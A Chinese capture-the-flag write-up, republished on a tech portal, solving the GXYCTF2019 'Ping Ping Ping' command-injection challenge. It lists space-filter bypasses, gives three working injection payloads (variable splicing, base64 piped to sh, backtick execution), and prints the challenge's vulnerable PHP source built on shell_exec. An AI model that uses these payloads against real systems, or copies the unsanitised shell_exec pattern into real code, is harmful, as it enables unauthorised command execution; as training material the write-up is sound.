IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> [GXYCTF2019]Ping Ping Ping -> 正文阅读

[PHP知识库][GXYCTF2019]Ping Ping Ping

这个ping一看就是命令注入了,命令注入的基础之前在一篇文章里面讲过,什么连接符之类的可以看这篇文章,就不多说了,打开界面,熟悉的专业注入受害者界面
在这里插入图片描述
先来个简单的注入,分号如果没过滤尽量先用分号去注入,比较方便灵活
在这里插入图片描述
这里直接看到flag.php,还以为比较简单,因为直接就注入了,直接访问flag.php,什么都没有,说明在注释或者未显示的变量里,这里准备使用cat命令来显示其内容

在这里插入图片描述原来有过滤,还使用了不文明用语,这里看来是过滤了空格,那就看看空格怎么绕过吧,在网上读到一篇博客讲的巨无敌详细,认真读过一遍之后,空格过滤一般采用

${IFS}替换
$IFS$1替换
${IFS替换
%20替换
<和<>重定向符替换
%09替换

这三种方式去绕过,这里尝试第一种
在这里插入图片描述

竟然还是有过滤,看来是某些字符被过滤了,这里可能是大括号的原因,使用另外一种,空格成功绕过
在这里插入图片描述
竟然flag这个字段被过滤了,那就意味着不能直接去读了,我们可以看看到底是哪些被过滤了,直接去读index.php应该没问题
在这里插入图片描述
果然戒备森严,不能有上面的特殊字符、空格、bash字段,甚至这个flag的匹配是贪婪匹配的,也就是说只要是按照f l a g这种顺序出现在字符串中都会被匹配到,不管中间有什么东西,想让其不匹配到,只能调换其位置,这为后文解法也做出了提示,下面的工作就是想办法绕过这flag字段去读取flag.php中的内容了

  1. 命令执行变量拼接
    这里就是换位的思想,将四个字母其中一个提前声明,换到前面来绕过过滤
payload=/?ip=1;a=g;cat$IFS$1fla$a.php

在这里插入图片描述没有回显了,冷静不要着急,看一看源码,可能是注释
在这里插入图片描述果然在这呢

  1. 过滤bash用sh执行
    这里都过滤了bash,那怎么能不挑战一下绕过这个呢,将我们的命令通过base64加密然后进行解密执行
    在这里插入图片描述
payload=/?ip=1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

原理是打出命令base64编码,使用管道符进行解密再使用管道符传给sh执行命令,l利用sh代替bash,注意echo也是系统命令,不是只有php有echo的
在这里插入图片描述该payload输出结果同一

  1. 内敛执行
    这也是我最喜欢的方法之一,优雅而又强大,利用ls的输出直接给cat输入执行语句,这里使用反引号优先执行后面的语句,反引号是命令注入常用符号,因为其可以忽略前面命令的错误而优先执行,其结果再给cat,打印出两个文件的全部内容
payload=/?ip=1;cat$IFS$1`ls`

在这里插入图片描述
最后贴一个本题源码吧

<?php
echo '/?ip=';
|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
    echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
    die("fxck your symbol!");
  } else if(preg_match("/ /", $ip)){
    die("fxck your space!");
  } else if(preg_match("/bash/", $ip)){
    die("fxck your bash!");
  } else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
    die("fxck your flag!");
  }
  $a = shell_exec("ping -c 4 ".$ip);
  echo "

";
  print_r($a);
}

?>

这个题就是上次那个注入的升级版,还行还行,学到了

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-08-25 11:59:32  更:2021-08-25 12:01:15 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 9:46:00-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码